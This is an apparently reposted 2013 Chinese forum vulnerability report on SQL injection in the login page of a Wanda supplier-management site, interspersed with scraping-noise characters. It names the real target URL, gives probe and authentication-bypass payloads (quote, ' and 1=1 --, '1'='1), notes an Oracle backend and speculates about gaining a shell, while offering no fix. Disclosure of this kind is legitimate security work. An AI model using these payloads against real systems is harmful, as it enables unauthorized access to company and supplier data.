找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2756|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。
8 K. E, v6 ]4 Q' ?. w详细说明:
6 n% L  ^1 S# O3 [1 s% N2 o4 [万达scm系统登陆框sql注入。
" g0 v9 ^2 D3 d6 Y2 j6 ]) J
$ j" Q% l2 X# C5 |7 e. Bhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
4 T4 @. A% E1 U# E6 T! F! C3 H  C; ?( @: J5 g5 b1 B  B
8 C( E7 Q: G1 |  t5 M# @
500错误。3 _& M# Q4 B# p" _* B* l
  j0 J4 U) l" ^& I3 J
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
2 L$ N! b1 ]) m5 [9 \+ {9 {http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png. R. U6 T" o$ x5 B, o
截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
! s1 Z8 S" G& Z. i* n$ x经过分析,登陆验证的过程应该是:
, F: z$ j* b  N2 |2 w. Z5 d  j: _7 c2 V+ r1 q
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
& P% ]4 Q$ e% j* Ghttp://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png7 _! s7 ]9 @4 @  Z  T$ D5 ^6 d+ C. h

9 M- b) o. p9 D  `! soracle数据库,存在注入点。@大连万达,你怎么看?
$ `3 d0 j2 y* _' g$ s. ^+ Zhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
" v( @1 {$ n& t6 A; W. [& \7 ^2 R3 p' [' I7 o
系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。4 z% A1 [# |0 Y3 |& C+ o4 r1 S
漏洞证明:
; R7 m  E) m3 Z$ c' g6 x" `万达scm系统登陆框sql注入。* @  x* J$ C/ }" G

5 @( e% O2 a0 A: \' p  chttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
# E( j2 J* ?. T2 {
: X* B3 ]& a4 x* I
/ [; v; |& m6 r4 C, U500错误。
) ^# g0 ]9 ]* Q0 f
1 m) ^9 t- t) }# N, D用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。4 F" ~  O# ^: h2 [- |; x6 o* y
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png
/ |9 X1 [7 }0 f' r: T6 k
/ a" T, W' ?: v$ r9 b2 G3 F9 r0 r
# k6 Z) p9 K9 U; f. o(截图有一点问题)- ]7 l) U3 e% D* g) G3 ]0 Y
& ^. r* K6 v7 _  |- ?- C
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
) l$ ^9 U$ [( K: R( F  r+ W; g
7 [: F- u4 @' O取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。0 I1 }2 y( {! z9 m6 e7 W9 K* r9 E
) n5 y/ i. R8 ^4 |  B$ ^* L: v3 X
绕过:
3 _- X3 Z  ?' {! ohttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1& h( d* _2 T! U# B" H

" t, U8 q% q' f6 K* O( W0 o
4 [9 L  G0 t/ \oracle数据库,存在注入点。@大连万达,你怎么看?9 f+ n; o$ H; Y
​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。# P2 {% z5 T& ^9 @2 i- A. W- H6 [
, ~' ]2 H2 `" `9 ?. U, H
修复方案:( `" S: D' t) I- E1 z. ]& D
。。。( W; F, n3 N& E9 A. f. h8 n& @3 o
3 V  C* @  A# d- B+ ~, p- q
  `0 @/ P+ A  j6 J
厂商已经确认
$ I! g& K6 t! b
5 i7 n, h! Q5 [$ F* A[/td][/tr]2 Q4 E) O# s5 P! r/ w9 a5 ]
[/table]
$ F/ }" [% `' x7 V/ D  P( ?
8 B  \. b, ^  \: j( H2 @# ~# w" e" l7 F! A% J
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表